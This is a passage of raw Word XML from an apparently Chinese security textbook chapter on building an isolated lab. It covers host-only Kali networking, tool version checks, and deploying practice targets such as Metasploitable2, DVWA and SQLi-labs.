        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">挂载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网卡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置中，将网络适配器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Adapter 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的连接方式设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Only Adapter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并选择</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节创建的虚拟网卡（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vboxnet0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。可根据需要启用第二块网卡（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）用于临时上网更新工具，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">更新完成后应立即禁用该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网卡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或将其断开，以保持实验网络隔离。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">启动并登录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动虚拟机，使用默认凭据（通常用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）登录，首次登录后建议立即修改密码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">更新系统（可选，但推荐）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网卡临时启用的情况下，执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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full-upgrade </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更新完成后，关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网卡或移除对应虚拟适配器，恢复为仅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">更新操作可能导致工具版本变化，与本书预期的部分输出不完全一致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但这不影响安全原理的学习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常用工具自检</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行以下命令确认核心工具可正常启动，此为环境就绪的基本指标：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 端口扫描器</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Metasploit 框架</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SQL 注入自动化工具</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 流量分析</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 密码破解</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 目录/文件爆破（可能需要 sudo apt install gobuster）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若某些工具未预装，可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install &lt;package&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安装。注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">部分工具（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">模块）随着版本更新，模块名称与参数可能变化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，遇到报错时请查阅对应工具的官方文档（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> man </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">page）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="验证攻击机与靶机的连通性"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证攻击机与靶机的连通性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机启动后，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终端使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">验证二层、三层可达性，并用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行主机发现（具体操作见后文“靶机实操单元”）。这些基础命令的原理与输出含义已在《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章中详细讨论，此处不再赘述。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="54" w:name="X2cf1df8c4fbe3f1b648f6c9f271179a6669048c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机部署：Metasploitable2/3、DVWA、SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VulnHub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节将部署四类代表性的脆弱靶机，它们分别面向不同层面的漏洞学习：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2/3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：全方位脆弱的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux/Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机，适合网络服务与操作系统漏洞的入门练习。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：自包含的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞演练环境，涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP Top 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的常见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLi-labs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：专注于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入漏洞的复数练习环境，包含多种注入场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VulnHub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：社区贡献的各类脆弱虚拟机，覆盖从提权到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞的各种挑战。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所有镜像均需从官方源或项目主页下载，请勿下载来源不明的版本。导入前应记录下载文件的校验值并与官方发布值比对，避免文件损坏或遭篡改。本书</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不提供任何靶机的预置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">或漏洞详情</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，保证学习者自行发现的过程完整性。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="49" w:name="部署-metasploitable2示例"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable2（示例）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SourceForge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">项目页下载</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">metasploitable2.zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，解压得到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.vmdk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">磁盘文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">创建虚拟机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：新建虚拟机，类型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux、版本</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">64-bit，内存</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 512 MB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可，选择“使用已有的虚拟硬盘文件”挂载解压后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.vmdk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将网卡设置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Host-Only。Metasploitable2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DHCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，启动后可通过靶机本地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip addr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（若可登录）或直接通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描发现其地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
